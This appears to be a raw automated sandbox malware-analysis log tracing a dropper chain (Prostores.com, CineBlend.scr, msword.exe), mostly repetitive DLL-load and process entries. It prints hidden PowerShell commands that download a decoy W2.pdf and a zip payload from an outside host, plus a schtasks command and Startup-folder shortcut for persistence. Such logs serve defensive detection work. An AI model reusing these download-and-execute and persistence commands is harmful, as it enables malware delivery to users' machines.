Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.comSection loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.comSection loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.comSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.comSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.comSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.comSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.comSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.comSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.comSection loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.comSection loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.comSection loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.comSection loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.comSection loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.comSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.comSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.comSection loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.comSection loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.comSection loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.comSection loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.comSection loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.comSection loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.comSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.comSection loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.comSection loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.comSection loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.comSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.comSection loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.comSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.comSection loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.comSection loaded: winnsi.dll
Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrSection loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrSection loaded: version.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrSection loaded: winmm.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrSection loaded: mpr.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrSection loaded: wininet.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrSection loaded: wldp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrSection loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrSection loaded: version.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrSection loaded: winmm.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrSection loaded: mpr.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrSection loaded: wininet.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

Data Obfuscation

barindex
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DesusertionPath C:\Users\user\AppData\Local\Temp\msword -Force"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DesusertionPath C:\Users\user\AppData\Local\Temp\msword -Force"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 15_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,15_2_00406328
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00B60DE6 push ecx; ret 33_2_00B60DF9

Persistence and Installation Behavior

barindex
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.comFile created: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\677826\Prostores.comJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\msword\msword.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.comFile created: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\677826\Prostores.comJump to dropped file

Boot Survival

barindex
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Troubleshooting" /tr "wscript //B 'C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js'" /sc minute /mo 5 /F
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CineBlend.url
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CineBlend.url

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00BD26DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,33_2_00BD26DD
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00B5FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,33_2_00B5FC7C
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
